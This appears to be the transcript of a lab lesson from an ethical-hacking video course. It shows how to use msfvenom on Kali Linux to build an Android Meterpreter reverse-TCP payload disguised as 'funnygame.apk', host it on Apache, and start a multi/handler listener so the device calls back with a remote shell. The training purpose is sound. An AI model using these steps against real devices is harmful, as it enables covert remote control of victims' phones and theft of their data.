We've got our Android device up and running, and we have our Kali Linux box ready. I'll log in. And to give you an idea of the number of exploits that we can set up using MSF Venom, just run MSF Venom -L. This should list the exploits that are included in the Metasploit framework Venom. This is what allows us to create payloads and then send those to devices. You can see this is quite several screenfuls. Tons of x86, tons of Windows, some PHP, so we can run those on web servers, some OS X. So if you want to test some Mac OS security, you've got it here too. Node.js, Linux, BSD, and then finally, as we get toward the top, we see some Android exploits that are included in here, including our old friend Meterpreter. Android/Meterpreter/reverse HTTP, Android Meterpreter reverse TCP. Could it be that easy? Well, let's find out. Let's dig in and use MSF Venom to set up our own Android Meterpreter reverse TCP exploit and see if we can get it onto our Android device. So I'm going to clear the screen first, and very similarly to the way we exploited Windows 7 and Windows 10, we're going to set up MSF Venom -Payload-P. We saw Android/Meterpreter/reverse_TCP. We do need an L host, so if you don't remember your Kali Linux IP address, you can start a new window and run an ifconfig. But we're still running at 10.0.3.5 because we made sure we were on our private network. So we need the L host equals 10.0.3.5. And we don't need a file format because there's only one format for Android devices. That's an APK or an Android package file. But we do need to tell it where to put the output. And I will put that directly on the desktop again, and then I'll copy it over. You could also just output this directly into your var www.html share folder if you still have that from earlier. But I will say -output /root/desktop/ let's call this funnygame.apk. Funnygame.apk. So just like our Windows Meterpreter, this is going to set up an Android version of the Meterpreter, a command line shell that's going to give us access to that Android device just like the Windows Meterpreter examples did. And we have had to specify our local host, that 10.0.3.5, so that when that reverse TCP comes calling, our local host will be where it calls back to. And then we've output that to the desktop as funnygame.apk. It should take just a moment to run, and now you'll notice I have a funnygame.apk file right here on my desktop. Well, if you still have your var www.html share folder from the Windows 7 and Windows 10 hacks, we should just be able to cp that desktop /funnygame.apk to our /var/ww tab/ht tab sh tab. And now if we ls that var www.html share, we should see the game.exe, the fun video.exe that we created for our Windows 7 and Windows 10. And now we have funnygame.apk. That Android package file is going to allow us to run this Meterpreter on a vulnerable Android device. So let's make sure that the Apache service is running. Service Apache 2 start. Then let's go ahead and run the MSF console so we can listen using that multi-handler. MSF console. You can also just run Metasploit from any of your links under applications or here on the left-hand bar. We'll say use exploit multi-handler, set the payload as Android / Meterpreter / reverse tab, T tab, reverse TCP. Just like before, we want to set our L host to 10.0.3.5. Our Kali Linux IP address, whatever yours is, goes right there. Then we can show options just like we've done before. Those are the only two required things, the L host and the L port. So we're ready to run the exploit. Exploit -J-Z. And so now we have Meterpreter listening for any Android device to call in using that 10.0.3.5 APK file. It's going to bring them back to this machine. So we'll switch back over to Android and we'll change the browser settings so that we'll be able to download this file effectively. And then we'll give this exploit a try. We'll see you in the next lesson.